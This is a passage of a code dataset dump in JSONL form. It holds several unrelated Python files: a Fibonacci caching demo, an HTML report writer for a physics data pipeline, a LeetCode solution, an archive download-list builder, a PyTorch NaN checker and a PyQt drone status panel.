fib2(n-2)\n\nfib2(10)\nfib2(10)\n\n\nprint(\"---fib3-------\")\n\nfrom functools import lru_cache\n@lru_cache()\n@timed\ndef fib3(n):\n print('calc fib({0})'.format(n))\n return 1 if n < 3 else fib3(n-1) + fib3(n-2)\n\nfib3(10)\nfib3(10)\n\n\n","repo_name":"xta0/CodeBase","sub_path":"python/basics/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9148714980","text":"import time\n\nfrom e3pipe.__logging__ import logger\n\n\nHTML_HEADER = \\\n\"\"\"\n\n\n\n \n\n\n\n%s\n\n\n\n\n
    \n

    %s

    \n
    \n\n
    \n\"\"\"\n\nHTML_FOOTER = \\\n\"\"\"\n
    \n\n
    \nExtreme Energy Events (EEE) is powered by\ne3pipe version %s.
    \nThis page validates as\nHTML5 and \ncss level 3.
    \nGenerated on %s.\n
    \n\n\n\"\"\"\n\n\ndef htmlAttributes(**kwargs):\n \"\"\" Format a python dictionary as a collection of html attributes.\n \"\"\"\n return ' '.join('%s=\"%s\"' % item for item in kwargs.items())\n\ndef htmlTableHeader(*args, **kwargs):\n \"\"\" Format a list of arguments as a html table header.\n \"\"\"\n text = ''\n for arg in args:\n text += '' % arg\n text += ''\n return text\n\n\n\nclass E3HtmlOutputFile(file):\n\n \"\"\" Utility class for html output.\n \"\"\"\n\n DEFAULT_CSS_FILE_PATH = 'e3pipe.css'\n DEFAULT_TITLE = 'EEE Data Quality Monitoring'\n DEFAULT_HEADER_TEXT = 'EEE DQM run report'\n\n def __init__(self, filePath, **kwargs):\n \"\"\" Constructor.\n \"\"\"\n css = kwargs.get('css', self.DEFAULT_CSS_FILE_PATH)\n title = kwargs.get('title', self.DEFAULT_TITLE)\n header = kwargs.get('header', self.DEFAULT_HEADER_TEXT)\n logger.info('Opening output file %s...' % filePath)\n file.__init__(self, filePath, 'w')\n self.write(HTML_HEADER % (title, css, header))\n\n def section(self, title):\n \"\"\" Start a new section in the output file.\n \"\"\"\n self.write('\\n

    %s

    \\n' % title)\n\n def li(self, text, **kwargs):\n \"\"\"\n \"\"\"\n self.write('
  • %s
  • \\n' % (htmlAttributes(**kwargs), text))\n\n def image(self, filePath, **kwargs):\n \"\"\" Add an image to the output file.\n \"\"\"\n self.write('\\n' %\\\n (filePath, htmlAttributes(**kwargs), filePath))\n\n def close(self):\n \"\"\" Write the footer and close the file.\n \"\"\"\n from e3pipe.__version__ import TAG\n self.write(HTML_FOOTER %\\\n (TAG, time.strftime('%A, %B %d %Y at %H:%M (%z)')))\n file.close(self)\n","repo_name":"centrofermi/e3pipe","sub_path":"dqm/E3HtmlOutputFile.py","file_name":"E3HtmlOutputFile.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"72002762660","text":"# 154. Find Minimum in Rotated Sorted Array II\n\nclass Solution:\n def findMin(self, nums: List[int]) -> int:\n # 63 ms\t14.6 MB\n # return min(nums)\n\n # 59 ms\t14.9 MB\n min_num = nums[0]\n for i in range(len(nums) - 1):\n if nums[i+1] < nums[i]:\n min_num = nums[i+1]\n break\n return min_num\n ","repo_name":"YukiT1990/Leetcode","sub_path":"00372_FindMinimuminRotatedSortedArrayII(154).py","file_name":"00372_FindMinimuminRotatedSortedArrayII(154).py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37033176878","text":"import re\nimport _helpers\n\n\nclass EAPFileList:\n\n COLLECTIONS_FILE = 'collections.txt'\n EAP_FILE = 'eap_files.txt'\n URL_FOR_FILE = 'https://eap.bl.uk/archive-file/'\n URL_FOR_COLL = 'https://eap.bl.uk/collection/'\n\n def get_eap_list(self):\n with open(self.COLLECTIONS_FILE) as f:\n collections = f.read().splitlines()\n return collections\n\n def generate_download_list(self, collections):\n download_list = []\n for collection in collections:\n print('Now adding files from collection ' + collection + ' to download list...')\n converted_url = self.URL_FOR_FILE + collection.replace('/', '-')\n collection_conv_url = self.URL_FOR_COLL + collection.replace('/', '-')\n coll_exists, coll_content = _helpers.page_exists(collection_conv_url)\n if not coll_exists:\n print(collection + ' is not a collection')\n else:\n try:\n search_desc = coll_content.find(\"span\", class_='search-description').get_text()\n except AttributeError:\n print('No documents found in ' + collection_conv_url)\n continue\n total_results = re.search(\".*of(.*)results.*\", search_desc.replace(',', '')).group(1).strip()\n if not _helpers.page_exists(converted_url + '-' + total_results):\n print('This collection probably has sub-collections. Please use those instead')\n else:\n for i in range(1, int(total_results) + 1):\n download_list.append(collection.replace('-', '/') + '/' + str(i))\n return download_list\n\n def write_to_file(self, eap_link):\n with open(self.EAP_FILE, 'a') as f:\n for entry in eap_link:\n f.write(entry + '\\n')\n\n def run(self):\n collections = self.get_eap_list()\n if not collections:\n print('collections.txt is empty')\n else:\n self.write_to_file(self.generate_download_list(collections))\n\n\nif __name__ == '__main__':\n EAPFileList().run()\n","repo_name":"prachatos/eap2pdf","sub_path":"get_eap_entry.py","file_name":"get_eap_entry.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"39033358663","text":"from queue import PriorityQueue\n\ndef min_except(costs,assignment):\n out = float('inf')\n \n for job in range(len(costs)):\n if job in assignment: continue\n if costs[job] < out: out = costs[job]\n \n return out\n\ndef lowerbound(assignment,C):\n m = len(assignment)\n lb = 0\n for i in range(len(C)):\n if i < m: lb += C[i][assignment[i]]\n else: lb += min_except(C[i],assignment)\n return lb\n\n\ndef assign(assignment,job):\n if job in assignment: return None\n return assignment+[job]\n\ndef findAssignments(C):\n \"\"\"Best First Branch and Bound\"\"\"\n n = len(C)\n Q = PriorityQueue()\n start = (lowerbound([],C),[])\n Q.put(start)\n\n optimal = (float('inf'),[])\n\n while Q.qsize()>0:\n lb, assignment = Q.get()\n if lb > optimal[0]: continue\n\n if len(assignment) == n: \n if lb < optimal[0]: optimal = (lb,assignment)\n continue\n\n for job in range(n):\n new_assignment = assign(assignment,job)\n if new_assignment:\n lb= lowerbound(new_assignment,C)\n Q.put((lb,new_assignment))\n\n return optimal\n\nC = [\n [9,2,7,8],\n [6,4,3,7],\n [5,8,1,8],\n [7,6,9,4]\n ]\n\ncost,assignment = findAssignments(C)\n\nprint(f\"Optimal Solution:-\\nAssignment: {assignment}\\nCost: {cost}\")","repo_name":"nonkloq/dump","sub_path":"algs/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32932718417","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: DIYer22@github\n@mail: ylxx@live.com\nCreated on Fri Feb 15 20:20:59 2019\n\"\"\"\nfrom . import torch, hasnan\n\n\ndef pthnan(pth):\n dic = torch.load(pth, map_location=\"cpu\")\n from collections import OrderedDict\n\n def getOrderedDict(seq):\n if isinstance(seq, OrderedDict):\n return seq\n if isinstance(seq, dict):\n seq = list(seq.values())\n if not isinstance(seq, (tuple, list)):\n return None\n for s in seq:\n re = getOrderedDict(s)\n if re is not None:\n return re\n\n od = getOrderedDict(dic)\n tensor = list(od.values())[-1]\n print(\n '\\n\"%s\"\\n\\nHas nan: %s\\n'\n % (\"\\x1b[36m%s\\x1b[0m\" % tensor[..., :10], \"\\x1b[31m%s\\x1b[0m\" % hasnan(tensor))\n )\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(\n description=\"\"\"\n detect a pth file \"Does it has nan?\" \"\"\"\n )\n parser.add_argument(\n \"pth\",\n default=\"/home/dl/github/maskrcnn/output/mix_11/model_final.pth\",\n type=str,\n )\n args = parser.parse_args()\n\n pthnan(pth=args.pth)\n","repo_name":"DIYer22/boxx","sub_path":"boxx/ylth/pthnan.py","file_name":"pthnan.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":466,"dataset":"github-code","pt":"35"} +{"seq_id":"35516127258","text":"\r\nfrom PyQt4 import QtCore, QtGui\r\nfrom model.VehicleEventDispatcher import VehicleEventDispatcher\r\nfrom model.VehicleConfigImageMap import VEHICLE_CONFIG_FILE_MAP\r\nfrom ui.subpanel.BasePanelController import BasePanelController\r\nfrom utilities.specialwidgets.BarGauge import BarGauge\r\nfrom ui.subpanel.vehicleoverallstatus.VehicleOverallStatusPanel import Ui_VehicleOverallStatusPanel\r\nimport math\r\nfrom ui.UIEventDispatcher import UIEventDispatcher\r\n\r\nclass VehicleOverallStatusController(QtGui.QWidget, BasePanelController):\r\n \r\n MOTORS_GAUGE_POSITION = {'Quad +' : ((182,22), (300,140), (182,255), (62,140)),\r\n 'Quad X' : ((80,35), (280,35), (80,240), (280,240)),\r\n 'Quad Y4' : ((66,23), (222,23), (145,260), (300,260)),\r\n 'Tri' : ((330,240), (80,35), (285,35), (182,240)),\r\n 'Hex +' : ((235,30), (390,100), (390,275),(235,350), (75,275), (75,100)),\r\n 'Hex X' : ((150,30), (320,30), (390,190), (320,350), (150,350), (75,190)),\r\n 'Hex Y6' : ((50,45), (170,45), (170,340), (295,45), (420,45), (300,340)),\r\n 'Octo X8' : ((192,27), (325,190), (192,350), (55,190),(275,27), (410,190), (275,350), (140,190)),\r\n 'Octo X' : ((165,25), (295,25), (385,130), (385,260), (295,350), (165,350), (70,260), (70,130)),\r\n 'Octo X+' : ((235,30), (360,65), (395,185), (360,315), (235,350), (110,315), (75,185), (110,65)) }\r\n\r\n \r\n def __init__(self, vehicle_event_dispatcher, ui_event_dispatcher):\r\n QtGui.QWidget.__init__(self)\r\n BasePanelController.__init__(self)\r\n self.ui = Ui_VehicleOverallStatusPanel()\r\n self.ui.setupUi(self)\r\n \r\n self._protocol_handler = None\r\n self._channel_count = 0\r\n self._flight_config = 'Quad +'\r\n self._channel_bar_gauge_array = []\r\n self._channels_label_array_text = ['Mode']\r\n self._channels_label_array_object = []\r\n self._motor_gauge_pixel_width = 25.0\r\n self._label_pixel_height = 25\r\n self._window_height = 400\r\n \r\n self._motors_count = 4\r\n self._vehicle_roll = 0.0\r\n self._vehicle_pitch = 0.0\r\n \r\n self._receiver_roll = 0\r\n self._receiver_pitch = 0\r\n self._receiver_yaw = 0\r\n self._receiver_throttle = 0\r\n\r\n horizon_background_image = QtGui.QPixmap('./resources/artificialHorizonBackGround.svg')\r\n self._horizon_background_image = QtGui.QGraphicsPixmapItem(horizon_background_image)\r\n \r\n horizon_dial_image = QtGui.QPixmap('./resources/artificialHorizonDial.svg')\r\n horizon_dial_item = QtGui.QGraphicsPixmapItem(horizon_dial_image)\r\n horizon_dial_item.setPos(QtCore.QPointF(100.0, 390.0))\r\n \r\n horizon_compass_background = QtGui.QPixmap('./resources/artificialHorizonCompassBackGround.svg')\r\n horizon_compass_background_item = QtGui.QGraphicsPixmapItem(horizon_compass_background)\r\n horizon_compass_background_item.setPos(QtCore.QPointF(100.0, 390.0))\r\n \r\n horizon_compass = QtGui.QPixmap('./resources/artificialHorizonCompass.svg')\r\n self._horizon_compass_item = QtGui.QGraphicsPixmapItem(horizon_compass)\r\n self._horizon_compass_item.setPos(QtCore.QPointF(100.0, 390.0)) \r\n \r\n horizon_scene = QtGui.QGraphicsScene()\r\n horizon_scene.addItem(self._horizon_background_image)\r\n horizon_scene.addItem(horizon_dial_item)\r\n horizon_scene.addItem(horizon_compass_background_item)\r\n horizon_scene.addItem(self._horizon_compass_item)\r\n\r\n # Setup text info in artificial horizon_background_image\r\n rollLabel = horizon_scene.addText('Roll:')\r\n rollLabel.setDefaultTextColor(QtCore.Qt.white)\r\n rollLabel.setPos(102, 420)\r\n self.roll = horizon_scene.addText('0.0')\r\n self.roll.setDefaultTextColor(QtCore.Qt.white)\r\n self.roll.setPos(125, 420)\r\n pitchLabel = horizon_scene.addText('Pitch:')\r\n pitchLabel.setDefaultTextColor(QtCore.Qt.white)\r\n pitchLabel.setPos(102, 405)\r\n self.pitch = horizon_scene.addText('0.0')\r\n self.pitch.setDefaultTextColor(QtCore.Qt.white)\r\n self.pitch.setPos(132, 405)\r\n headingLabel = horizon_scene.addText('Heading:')\r\n headingLabel.setDefaultTextColor(QtCore.Qt.white)\r\n headingLabel.setPos(102, 390)\r\n self.heading = horizon_scene.addText('0.0')\r\n self.heading.setDefaultTextColor(QtCore.Qt.white)\r\n self.heading.setPos(147, 390)\r\n altitudeLabel = horizon_scene.addText('Altitude:')\r\n altitudeLabel.setDefaultTextColor(QtCore.Qt.white)\r\n altitudeLabel.setPos(320, 390)\r\n self.altitude = horizon_scene.addText('000.0')\r\n self.altitude.setDefaultTextColor(QtCore.Qt.white)\r\n self.altitude.setPos(363, 390)\r\n altHoldLabel = horizon_scene.addText('Alt Hold:')\r\n altHoldLabel.setDefaultTextColor(QtCore.Qt.white)\r\n altHoldLabel.setPos(331, 405)\r\n self.altitudeHold = horizon_scene.addText('Off')\r\n self.altitudeHold.setDefaultTextColor(QtCore.Qt.red)\r\n self.altitudeHold.setPos(374, 405)\r\n armLabel = horizon_scene.addText('Motors:')\r\n armLabel.setDefaultTextColor(QtCore.Qt.white)\r\n armLabel.setPos(102, 653)\r\n self.motorArm = horizon_scene.addText('Not Armed')\r\n self.motorArm.setDefaultTextColor(QtCore.Qt.red)\r\n self.motorArm.setPos(102, 668)\r\n battLabel = horizon_scene.addText('Batt:')\r\n battLabel.setDefaultTextColor(QtCore.Qt.white)\r\n battLabel.setPos(330, 653)\r\n self.batteryPower = horizon_scene.addText('0.000')\r\n self.batteryPower.setDefaultTextColor(QtCore.Qt.white)\r\n self.batteryPower.setPos(357, 653)\r\n modeLabel = horizon_scene.addText('Mode:')\r\n modeLabel.setDefaultTextColor(QtCore.Qt.white)\r\n modeLabel.setPos(330, 668)\r\n self.flightMode = horizon_scene.addText('Acro')\r\n self.flightMode.setDefaultTextColor(QtCore.Qt.yellow)\r\n self.flightMode.setPos(362, 668)\r\n self.ui.artificialHorizon.setScene(horizon_scene)\r\n \r\n # Setup left transmitter stick\r\n leftStickScene = QtGui.QGraphicsScene()\r\n leftStickBackground = QtGui.QPixmap('./resources/TxDial.png')\r\n leftStickItem = QtGui.QGraphicsPixmapItem(leftStickBackground)\r\n leftStickScene.addItem(leftStickItem)\r\n self.leftStick = QtGui.QGraphicsEllipseItem(QtCore.QRectF(75, 75, 30, 30))\r\n self.leftStick.setPen(QtGui.QPen(QtGui.QBrush(QtCore.Qt.black, QtCore.Qt.SolidPattern), 2))\r\n self.leftStick.setBrush(QtGui.QBrush(QtCore.Qt.blue, QtCore.Qt.SolidPattern))\r\n leftStickScene.addItem(self.leftStick)\r\n self.ui.leftTransmitter.setScene(leftStickScene)\r\n \r\n # Setup right transmitter stick\r\n rightStickScene = QtGui.QGraphicsScene()\r\n rightStickBackground = QtGui.QPixmap('./resources/TxDial.png')\r\n rightStickItem = QtGui.QGraphicsPixmapItem(rightStickBackground)\r\n rightStickScene.addItem(rightStickItem)\r\n self.rightStick = QtGui.QGraphicsEllipseItem(QtCore.QRectF(75, 75, 30, 30))\r\n self.rightStick.setPen(QtGui.QPen(QtGui.QBrush(QtCore.Qt.black, QtCore.Qt.SolidPattern), 2))\r\n self.rightStick.setBrush(QtGui.QBrush(QtCore.Qt.blue, QtCore.Qt.SolidPattern))\r\n rightStickScene.addItem(self.rightStick)\r\n self.ui.rightTransmitter.setScene(rightStickScene)\r\n \r\n vehicle_event_dispatcher.register(self._flight_config_received, VehicleEventDispatcher.FLIGHT_CONFIG_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_channel_count_received, VehicleEventDispatcher.RECEIVER_NB_CHANNEL_EVENT)\r\n vehicle_event_dispatcher.register(self._motors_count_received, VehicleEventDispatcher.NUMBER_MOTORS_EVENT)\r\n vehicle_event_dispatcher.register(self._motor_armed_event, VehicleEventDispatcher.MOTOR_ARMED_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_roll_event, VehicleEventDispatcher.VEHICLE_ROLL_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_pitch_event, VehicleEventDispatcher.VEHICLE_PITCH_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_heading_event, VehicleEventDispatcher.VEHICLE_HEADING_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_altitude_hold_state_event, VehicleEventDispatcher.ALTITUDE_HOLD_STATE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_altitude_event, VehicleEventDispatcher.VEHICLE_ALTITUDE_PROPERTY_EVENT)\r\n \r\n vehicle_event_dispatcher.register(self._receiver_roll_event, VehicleEventDispatcher.RECEIVER_ROLL_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_pitch_event, VehicleEventDispatcher.RECEIVER_PITCH_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_yaw_event, VehicleEventDispatcher.RECEIVER_YAW_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_throttle_event, VehicleEventDispatcher.RECEIVER_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_mode_event, VehicleEventDispatcher.RECEIVER_MODE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux1_event, VehicleEventDispatcher.RECEIVER_AUX1_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux2_event, VehicleEventDispatcher.RECEIVER_AUX2_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux3_event, VehicleEventDispatcher.RECEIVER_AUX3_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux4_event, VehicleEventDispatcher.RECEIVER_AUX4_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux5_event, VehicleEventDispatcher.RECEIVER_AUX5_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux6_event, VehicleEventDispatcher.RECEIVER_AUX6_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux7_event, VehicleEventDispatcher.RECEIVER_AUX7_PROPERTY_EVENT)\r\n \r\n vehicle_event_dispatcher.register(self._motor1_throttle_event, VehicleEventDispatcher.MOTOR1_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor2_throttle_event, VehicleEventDispatcher.MOTOR2_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor3_throttle_event, VehicleEventDispatcher.MOTOR3_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor4_throttle_event, VehicleEventDispatcher.MOTOR4_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor5_throttle_event, VehicleEventDispatcher.MOTOR5_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor6_throttle_event, VehicleEventDispatcher.MOTOR6_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor7_throttle_event, VehicleEventDispatcher.MOTOR7_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor8_throttle_event, VehicleEventDispatcher.MOTOR8_THROTTLE_PROPERTY_EVENT)\r\n \r\n vehicle_event_dispatcher.register(self._flight_mode_event, VehicleEventDispatcher.FLIGHT_MODE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._battery_voltage_received, VehicleEventDispatcher.BATTERY_VOLTAGE_PROPERTY_EVENT)\r\n \r\n ui_event_dispatcher.register(self._protocol_handler_changed_event, UIEventDispatcher.PROTOCOL_HANDLER_EVENT)\r\n \r\n def _protocol_handler_changed_event(self, event, protocol_handler):\r\n self._protocol_handler = protocol_handler;\r\n \r\n def _flight_config_received(self, event, flight_config):\r\n self._flight_config = flight_config\r\n \r\n def _receiver_channel_count_received(self, event, channel_count):\r\n self._channel_count = int(channel_count)\r\n if (self._channel_count == 5) :\r\n self._channels_label_array_text = ['Mode']\r\n elif (self._channel_count == 6) :\r\n self._channels_label_array_text = ['Mode', 'Aux1']\r\n elif (self._channel_count == 7) :\r\n self._channels_label_array_text = ['Mode', 'Aux1', 'Aux2']\r\n elif (self._channel_count == 8) :\r\n self._channels_label_array_text = ['Mode', 'Aux1', 'Aux2', 'Aux3']\r\n elif (self._channel_count == 9) :\r\n self._channels_label_array_text = ['Mode', 'Aux1', 'Aux2', 'Aux3', 'Aux4']\r\n else :\r\n self._channels_label_array_text = ['Mode', 'Aux1', 'Aux2', 'Aux3', 'Aux4', 'Aux5']\r\n \r\n transmitterScene = QtGui.QGraphicsScene()\r\n for channel in range(self._channel_count-4):\r\n barGauge = QtGui.QGraphicsRectItem()\r\n barGauge.setBrush(QtGui.QBrush(QtCore.Qt.blue, QtCore.Qt.SolidPattern))\r\n self._channel_bar_gauge_array.append(barGauge)\r\n transmitterScene.addItem(self._channel_bar_gauge_array[channel])\r\n label = transmitterScene.addText(self._channels_label_array_text[channel])\r\n label.setDefaultTextColor(QtCore.Qt.white)\r\n label.setPos(self.compute_channel_bar_location(channel), self.ui.transmitterOutput.height())\r\n self._channels_label_array_object.append(label)\r\n self.ui.transmitterOutput.setScene(transmitterScene) \r\n \r\n for channel in range(self._channel_count-4):\r\n self._update_receiver_bar_widget(channel, 1000)\r\n self._channels_label_array_object[channel].setPos(self.compute_channel_bar_location(channel) - 3, self.ui.transmitterOutput.height() - self._label_pixel_height)\r\n \r\n self.ui.transmitterOutput.centerOn(0.0, 0.0)\r\n \r\n def _motors_count_received(self, event, motors_count):\r\n self._motors_count = int(motors_count)\r\n motorScene = QtGui.QGraphicsScene()\r\n self.motor = []\r\n motorLocation = VehicleOverallStatusController.MOTORS_GAUGE_POSITION[self._flight_config]\r\n for motorIndex in range(int(motors_count)):\r\n self.motor.append(BarGauge('Motor ' + str(motorIndex+1)))\r\n self.motor[motorIndex].setPos(motorLocation[motorIndex][0], motorLocation[motorIndex][1])\r\n motorScene.addItem(self.motor[motorIndex])\r\n self.ui.motorView.setScene(motorScene)\r\n vehicleImage = QtGui.QPixmap(VEHICLE_CONFIG_FILE_MAP[self._flight_config])\r\n scaledImage = vehicleImage.scaled(400, 400, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)\r\n motorScene.addPixmap(scaledImage)\r\n \r\n def _motor_armed_event(self, event, are_motor_armed):\r\n if are_motor_armed :\r\n self.motorArm.setPlainText('Armed')\r\n self.motorArm.setDefaultTextColor(QtCore.Qt.green)\r\n else :\r\n self.motorArm.setPlainText('Not Armed')\r\n self.motorArm.setDefaultTextColor(QtCore.Qt.red)\r\n \r\n def _vehicle_roll_event(self, event, vehicle_roll):\r\n self._vehicle_roll = math.degrees(vehicle_roll)\r\n self.roll.setPlainText('{:.1f}'.format(self._vehicle_roll))\r\n self._update_pitch_poll_widget(self._vehicle_roll,self._vehicle_pitch)\r\n \r\n def _vehicle_pitch_event(self, event, vehicle_pitch):\r\n self._vehicle_pitch = math.degrees(vehicle_pitch)\r\n self.pitch.setPlainText('{:.1f}'.format(self._vehicle_pitch))\r\n self._update_pitch_poll_widget(self._vehicle_roll,self._vehicle_pitch) \r\n\r\n def _update_pitch_poll_widget(self, rollAngle, pitchAngle):\r\n pitchPosition = self._scale_receiver_channel_to_widget(-pitchAngle, (-135.0, 135.0), (540.0, -540.0))\r\n rollCenter = self._scale_receiver_channel_to_widget(-pitchAngle, (-135.0, 135.0), (0, 1080.0))\r\n self._horizon_background_image.setPos(0, pitchPosition)\r\n self._horizon_background_image.setTransformOriginPoint(250.0, rollCenter)\r\n self._horizon_background_image.setRotation(-rollAngle)\r\n\r\n def _vehicle_heading_event(self, event, vehicle_heading): \r\n heading = math.degrees(vehicle_heading)\r\n self.heading.setPlainText('{:.1f}'.format(heading).zfill(5))\r\n self._horizon_compass_item.setTransformOriginPoint(150.0, 150.0)\r\n self._horizon_compass_item.setRotation(-heading)\r\n \r\n def _vehicle_altitude_hold_state_event(self, event, vehicle_altitude):\r\n if vehicle_altitude == '1':\r\n self.altitudeHold.setPlainText('On')\r\n self.altitudeHold.setDefaultTextColor(QtCore.Qt.green)\r\n else:\r\n self.altitudeHold.setPlainText('Off')\r\n self.altitudeHold.setDefaultTextColor(QtCore.Qt.red)\r\n \r\n def _vehicle_altitude_event(self, event, vehicle_altitude):\r\n self.altitude.setPlainText('{:.1f}'.format(vehicle_altitude).zfill(5))\r\n \r\n def _receiver_roll_event(self, event, roll):\r\n self._receiver_roll = roll\r\n self._update_right_stick_widget(self._receiver_roll, self._receiver_pitch)\r\n \r\n def _receiver_pitch_event(self, event, pitch):\r\n self._receiver_pitch = pitch\r\n self._update_right_stick_widget(self._receiver_roll, self._receiver_pitch)\r\n \r\n def _update_right_stick_widget(self, roll, pitch):\r\n rollPosition = self._scale_receiver_channel_to_widget(roll, (1000.0, 2000.0), (-57.0, 55.0))\r\n pitchPosition = self._scale_receiver_channel_to_widget(pitch, (1000.0, 2000.0), (58.0, -57.0))\r\n self.rightStick.setPos(rollPosition, pitchPosition) \r\n \r\n def _receiver_yaw_event(self, event, yaw):\r\n self._receiver_yaw = yaw\r\n self._update_left_stick_widget(self._receiver_throttle, self._receiver_yaw)\r\n \r\n def _receiver_throttle_event(self, event, throttle):\r\n self._receiver_throttle = throttle\r\n self._update_left_stick_widget(self._receiver_throttle, self._receiver_yaw)\r\n \r\n def _update_left_stick_widget(self, throttle, yaw):\r\n throttlePosition = self._scale_receiver_channel_to_widget(throttle, (1000.0, 2000.0), (58.0, -57.0))\r\n yawPosition = self._scale_receiver_channel_to_widget(yaw, (1000.0, 2000.0), (-57.0, 55.0))\r\n self.leftStick.setPos(yawPosition, throttlePosition)\r\n \r\n def _scale_receiver_channel_to_widget(self, val, src, dst):\r\n return ((val - src[0]) / (src[1]-src[0])) * (dst[1]-dst[0]) + dst[0]\r\n \r\n def _receiver_mode_event(self, event, mode):\r\n self._update_receiver_bar_widget(0, mode)\r\n \r\n def _receiver_aux1_event(self, event, aux1):\r\n if self._channel_count >= 6 :\r\n self._update_receiver_bar_widget(1, aux1)\r\n \r\n def _receiver_aux2_event(self, event, aux2):\r\n if self._channel_count >= 7 :\r\n self._update_receiver_bar_widget(2, aux2)\r\n \r\n def _receiver_aux3_event(self, event, aux3):\r\n if self._channel_count >= 8 :\r\n self._update_receiver_bar_widget(3, aux3)\r\n \r\n def _receiver_aux4_event(self, event, aux4):\r\n if self._channel_count >= 9 :\r\n self._update_receiver_bar_widget(4, aux4)\r\n \r\n def _receiver_aux5_event(self, event, aux5):\r\n if self._channel_count >= 10 :\r\n self._update_receiver_bar_widget(5, aux5)\r\n \r\n def _receiver_aux6_event(self, event, aux6):\r\n if self._channel_count >= 11 :\r\n self._update_receiver_bar_widget(6, aux6)\r\n \r\n def _receiver_aux7_event(self, event, aux7):\r\n if self._channel_count >= 12 :\r\n self._update_receiver_bar_widget(7, aux7)\r\n \r\n def _motor1_throttle_event(self, event, motor1_throttle):\r\n self.motor[0].setValue(motor1_throttle)\r\n\r\n def _motor2_throttle_event(self, event, motor2_throttle):\r\n self.motor[1].setValue(motor2_throttle)\r\n\r\n def _motor3_throttle_event(self, event, motor3_throttle):\r\n self.motor[2].setValue(motor3_throttle)\r\n\r\n def _motor4_throttle_event(self, event, motor4_throttle):\r\n self.motor[3].setValue(motor4_throttle)\r\n\r\n def _motor5_throttle_event(self, event, motor5_throttle):\r\n if self._motors_count >= 6 :\r\n self.motor[4].setValue(motor5_throttle)\r\n\r\n def _motor6_throttle_event(self, event, motor6_throttle):\r\n if self._motors_count >= 6 :\r\n self.motor[5].setValue(motor6_throttle)\r\n\r\n def _motor7_throttle_event(self, event, motor7_throttle):\r\n if self._motors_count >= 8 :\r\n self.motor[6].setValue(motor7_throttle)\r\n\r\n def _motor8_throttle_event(self, event, motor8_throttle):\r\n if self._motors_count >= 8 :\r\n self.motor[7].setValue(motor8_throttle)\r\n \r\n def _flight_mode_event(self, event, flight_mode):\r\n self.flightMode.setPlainText(flight_mode)\r\n if flight_mode == 'Accro':\r\n self.flightMode.setDefaultTextColor(QtCore.Qt.yellow)\r\n else:\r\n self.flightMode.setDefaultTextColor(QtCore.Qt.green)\r\n \r\n def _battery_voltage_received(self, event, battery_voltage):\r\n self.batteryPower.setPlainText('{:.3f}'.format(battery_voltage))\r\n \r\n def start(self):\r\n self._protocol_handler.unsubscribe_command()\r\n self._protocol_handler.subscribe_vehicle_status()\r\n \r\n def stop(self):\r\n self._protocol_handler.unsubscribe_command()\r\n \r\n def _update_receiver_bar_widget(self, channel, value):\r\n output = self._scale_receiver_channel_to_widget(value, (1000.0, 2000.0), (25.0, self._window_height - 10)) - self._label_pixel_height\r\n self._channel_bar_gauge_array[channel].setRect(self.compute_channel_bar_location(channel), self._window_height-(output + self._label_pixel_height), self._motor_gauge_pixel_width, output)\r\n\r\n def compute_channel_bar_location(self, channel):\r\n barPosition = (self.ui.transmitterOutput.width() - (self._motor_gauge_pixel_width * self._channel_count)) / (self._channel_count + 1)\r\n location = ((channel + 1) * barPosition) + (channel * self._motor_gauge_pixel_width)\r\n return location\r\n\r\n def resizeEvent(self, event):\r\n self._window_height = self.ui.transmitterOutput.height()\r\n self.windowWidth = self.ui.transmitterOutput.width()\r\n self.ui.transmitterOutput.setSceneRect(0, 0, self.windowWidth*2, self._window_height*2)\r\n self.ui.transmitterOutput.centerOn(0,0)\r\n for channel in range(self._channel_count-4):\r\n 